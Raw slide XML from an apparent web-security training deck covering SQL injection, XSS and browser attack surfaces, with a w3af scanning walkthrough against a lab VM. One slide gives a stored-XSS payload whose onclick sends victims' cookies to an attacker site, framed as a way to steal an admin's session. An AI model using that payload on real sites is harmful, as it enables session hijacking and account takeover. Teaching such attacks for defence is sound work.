      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="Shape 269"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5763989" x="5847435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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Shape 270"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5824620" x="6817528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AND MORE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1578075" x="491625"/>
            <a:ext cy="7496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Specifics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Shape 272"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3064799" x="2192950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   +  NAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Shape 273"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2986550" x="3822300"/>
            <a:ext cy="1646891" cx="1376460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4481050" x="209025"/>
            <a:ext cy="2284800" cx="499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</a:rPr>
              <a:t>Hackers can exploit metacharacter injection flaws, buffer overflow flaws, and etc to hack servers.  Common targets are in yellow.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sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLi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sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web server exploits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</a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apache, tomcat, etc.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sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access control implementation flaws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sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>weak (admin) passwords</a:t>
            </a:r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7" name="Shape 10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8" name="Shape 10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REAL XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1099" name="Shape 10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Here is some realistic XSS example code that can steal session IDs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An attacker "Mr.NiceGuy"can enter this as his username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&lt;a href=# onclick=\"document.location=\'http://my-xssattack.com/xss.php?c=\'+escape\(document.cookie\)\;\"&gt;Mr.NiceGuy&lt;/a&gt;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Anyone who clicks on his username will have their cookie sent to the attackers site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i.e. Troll until the admin tries to ban you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when the admin clicks on your name, you steal their cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1100" name="Shape 1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2700" x="7223351"/>
            <a:ext cy="1333307" cx="133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4" name="Shape 1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5" name="Shape 1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 Conclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1106" name="Shape 1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only covered ONE form of xss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Stored XSS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There are others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Reflected XSS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DOM XSS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Flash/Flex XSS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etc..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0" name="Shape 1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1" name="Shape 1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Defending against XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody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https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet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Developers MUST Validate and Encode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encoding must be contextual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Whitelist validation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see above for more details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6" name="Shape 1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7" name="Shape 1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Attacking with XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118" name="Shape 1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XSS Filter evasion cheat sheet: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https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet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2" name="Shape 1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3" name="Shape 1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4" name="Shape 1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5" name="Shape 1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6858001" cx="91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Shape 1126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="412600" x="1625375"/>
            <a:ext cy="1095000" cx="5878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7200" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questions???</a:t>
            </a:r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0" name="Shape 1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1" name="Shape 1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132" name="Shape 1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Jason Pubal "SQL Injection" derbycon presentation </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1100" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://intellavis.com/blog/?p=498</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1100" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://dl.dropbox.com/u/14820738/SQLi.pdf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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1100" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Main_Page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www.pentesterlab.com </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1100" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.pentesterlab.com/from_sqli_to_shell.html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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLNINJA </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://sqlninja.sourceforge.net/sqlninja-howto.html</a:t>
            </a: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6" name="Shape 1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7" name="Shape 1137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w3af tool slides</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138" name="Shape 1138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 may not use these</a:t>
            </a:r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2" name="Shape 1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3" name="Shape 11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w3af comes with backtrack 5 and is a python program located in</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>/pentest/web/w3af/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run via:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>python w3af_console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tutorial available here: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http://resources.infosecinstitute.com/w3af-tutorial/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its great :D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1144" name="Shape 1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do some discovery with w3af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8" name="Shape 1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9" name="Shape 11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w3af setup 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1150" name="Shape 11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Type in the w3af console:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>target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view</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>set target &lt;&lt;use the ip of the target vm&gt;&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1151" name="Shape 1151"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2627525" x="91903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2" name="Shape 1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23084" x="457200"/>
            <a:ext cy="2644815" cx="852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6" name="Shape 1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7" name="Shape 1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w3af setup 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1158" name="Shape 11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type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>'back' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>to return to the previous menu, or CTRL-C...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Now we want to select the plugins we want to use, and we want discovery ones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We're going to type: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w3af&gt;&gt; plugins</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" i="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>w3af/plugins&gt;&gt; discovery afd allowedMethods fingerprint_WAF fingerprint_os  ghdb phpEggs phpinfo robotsReader sitemapReader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Attacking the Users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Shape 281"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3756338" x="7924507"/>
            <a:ext cy="1143299" cx="1175399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282" name="Shape 282"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3988142" x="4811468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283" name="Shape 283"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4968357" x="6610621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Authentication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284" name="Shape 284"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4968357" x="7916629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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Shape 285"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2787096" x="7836664"/>
            <a:ext cy="927300" cx="126329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Web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86" name="Shape 286"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3434605" x="6125575"/>
            <a:ext cy="999432" cx="1343249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87" name="Shape 287"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="286" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3244621" x="2458075"/>
            <a:ext cy="689700" cx="36675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8" name="Shape 288"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3539498" x="2199961"/>
            <a:ext cy="566699" cx="395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9" name="Shape 289"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="286" idx="3"/>
            <a:endCxn id="281" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3934321" x="7468824"/>
            <a:ext cy="393600" cx="45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90" name="Shape 290"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="285" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="3250746" x="7412764"/>
            <a:ext cy="391800" cx="42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91" name="Shape 291"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4433998" x="7324863"/>
            <a:ext cy="559799" cx="66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92" name="Shape 292"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="286" idx="2"/>
            <a:endCxn id="283" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4434037" x="6797199"/>
            <a:ext cy="534300" cx="40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93" name="Shape 293"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2671819" x="7021869"/>
            <a:ext cy="618300" cx="622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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="Shape 294"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2671819" x="6172864"/>
            <a:ext cy="618300" cx="744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FLASH</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1000" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr sz="1000" lang="en"/>
              <a:t>/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Shape 295"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5097051" x="5665543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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Shape 296"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5763989" x="5847435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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Shape 297"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5824620" x="6817528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 MORE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y="1578075" x="491625"/>
            <a:ext cy="7496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Specifics on dynamic content attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Shape 299"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3064799" x="2192950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   +  NAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Shape 300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2986550" x="3822300"/>
            <a:ext cy="1646891" cx="1376460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y="4633450" x="442450"/>
            <a:ext cy="1941900" cx="46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1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic content is everywhere today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Feeds pulled from other websites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embedded remote resources (youtube, jpgs, pngs, etc...)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advertisements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sometimes with javascript!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viral videos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sign in with twitter, facebook, gmail, etc...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and more!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y="1597762" x="4363070"/>
            <a:ext cy="1007700" cx="471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</a:rPr>
              <a:t>Users are often attacked by malicious content that executes code on their machine.  Usually client-side scripting is exploited, such as: javascript, actionscript, vbscript, html5....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2" name="Shape 1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3" name="Shape 1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Enumeration Report</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1164" name="Shape 1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go back, and type "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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We'll get LOTS of results but the breakdown is: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Target is running </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1800" lang="en"/>
              <a:t>Apache/2.2.16</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t> on Debian (So its hosting a website)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the target is running </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1800" lang="en"/>
              <a:t>PHP/5.3.3-7+squeeze13</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>,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has active filtering on URLs, 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the site has the following directories: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br>
              <a:rPr sz="1800" lang="en"/>
            </a:br>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1165" name="Shape 1165"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off y="40530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{F556BCCD-AEAE-4393-A666-A8C3BA9C0C52}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/admin/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/admin/index.php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/all/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/cat/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/classes/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/css/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/footer/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/header/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/icons/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/images/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/index/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/show/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9" name="Shape 1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0" name="Shape 1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Vulnerability Analysis time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171" name="Shape 1171"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1417637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enter the target ip in a web browser (I'm using firefox + burpsuite, as always) and visit those URLs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2" name="Shape 1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95087" x="626682"/>
            <a:ext cy="4282237" cx="762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Shape 1173"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3983525" x="5867900"/>
            <a:ext cy="990299" cx="2785199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We've used BurpSuite before, so that wont be covered this time</a:t>
            </a:r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7" name="Shape 1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8" name="Shape 11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Vuln scanning with w3af</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179" name="Shape 11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w3af/plugins&gt;&gt;&gt; audit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(Gives us a list of audit tools)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we'll use:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>w3af/plugins&gt;&gt;&gt;audit blindSqli sqli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but we need to change the target b4 we begin, to give it some of the URLs we discovered.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3" name="Shape 1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4" name="Shape 11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w3af setup again</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1185" name="Shape 11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go back twice and goto target and give it a few URLs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w3af/config:target&gt;&gt;&gt;set target 192.168.43.130,http://192.168.43.130/,http://192.168.43.130/cat.php?id=1,http://192.168.43.130/admin/login.php,http://192.168.43.130/all.php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/>
              <a:t>so, the cat.php, admin/login.php, and all.php pages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9" name="Shape 1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0" name="Shape 11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Interesting Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1191" name="Shape 11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Found 6 URLs and 6 different points of injection.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The list of fuzzable requests is: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 | Method: GET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http://192.168.43.130/ | Method: GET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</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="1400" lang="en"/>
              <a:t>http://192.168.43.130/admin/index.php | Method: POST | Parameters: (user="", password="")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http://192.168.43.130/admin/login.php | Method: GET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http://192.168.43.130/all.php | Method: GET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http://192.168.43.130/cat.php | Method: GET | Parameters: (id="1")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u="sng" b="1" sz="1400" lang="en"/>
              <a:t>Blind SQL injection was found at: "http://192.168.43.130/cat.php", using HTTP method GET. The injectable parameter is: "id". This vulnerability was found in the requests with ids 250 to 251.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 SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "MySQL server version for the right syntax to use". The error was found on response with id 261.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 SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "You have an error in your SQL syntax;". The error was found on response with id 261.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SQL injection in a MySQL database was found at: "http://192.168.43.130/cat.php", using HTTP method GET. The sent data was:</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="1400" lang="en"/>
              <a:t> "id=d%27z%220"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>. This vulnerability was found in the request with id 261.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Scan finished in 7 seconds.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Attacking the Users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Shape 309"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3756338" x="7924507"/>
            <a:ext cy="1143299" cx="11753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310" name="Shape 310"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3988142" x="4811468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311" name="Shape 311"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4968357" x="6610621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Authentication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312" name="Shape 312"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4968357" x="7916629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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Shape 313"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2787096" x="7836664"/>
            <a:ext cy="927300" cx="126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Web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314" name="Shape 314"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3434605" x="6125575"/>
            <a:ext cy="999432" cx="1343249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315" name="Shape 315"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="314" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3244621" x="2458075"/>
            <a:ext cy="689700" cx="36675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6" name="Shape 316"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3539498" x="2199961"/>
            <a:ext cy="566699" cx="395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7" name="Shape 317"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="314" idx="3"/>
            <a:endCxn id="309" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3934321" x="7468824"/>
            <a:ext cy="393600" cx="45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18" name="Shape 318"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="313" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="3250746" x="7412764"/>
            <a:ext cy="391800" cx="42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y="4433998" x="7324863"/>
            <a:ext cy="559799" cx="66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20" name="Shape 320"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="314" idx="2"/>
            <a:endCxn id="311" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4434037" x="6797199"/>
            <a:ext cy="534300" cx="40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321" name="Shape 321"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2671819" x="7021869"/>
            <a:ext cy="618300" cx="622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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="Shape 322"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2671819" x="6172864"/>
            <a:ext cy="618300" cx="7442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FLASH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/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Shape 323"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5097051" x="5665543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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Shape 324"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5763989" x="5847435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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Shape 325"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5824620" x="6817528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AND MORE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y="1578075" x="491625"/>
            <a:ext cy="7496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Specifics on other common dynamic content attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Shape 327"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3064799" x="2192950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   +  NAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Shape 328"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2986550" x="3822300"/>
            <a:ext cy="1646891" cx="1376460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y="4240124" x="688150"/>
            <a:ext cy="417900" cx="135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y="4633442" x="405575"/>
            <a:ext cy="1339799" cx="2114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Browsers, browser plugins, and media viewer plugins are all subject to exploitable vulnerabilities (buffer overflows, integer overflows, etc...)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="331" name="Shape 331"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="323" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="5406201" x="4572043"/>
            <a:ext cy="382500" cx="1093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lgDash"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="332" name="Shape 332"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="324" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5997539" x="4596435"/>
            <a:ext cy="75600" cx="12510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lgDash"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Shape 333"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2249125" x="4522850"/>
            <a:ext cy="3404425" cx="1929575"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="77183" extrusionOk="0" h="136177">
                <a:moveTo>
                  <a:pt y="136177" x="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt y="12782" x="22614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="0" x="56043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="16223" x="77183"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="lgDash"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Shape 334"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5070975" x="3062750"/>
            <a:ext cy="1437899" cx="173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chemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious content can be uploaded onto sites by hackers to attack these browser vulnerabilities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1180" x="3641444"/>
            <a:ext cy="2253238" cx="338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Attacking the Admins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="Shape 342"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3756338" x="7924507"/>
            <a:ext cy="1143299" cx="11753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343" name="Shape 343"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3988142" x="4811468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344" name="Shape 344"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4968357" x="6610621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Authentication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345" name="Shape 345"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4968357" x="7916629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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Shape 346"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2787096" x="7836664"/>
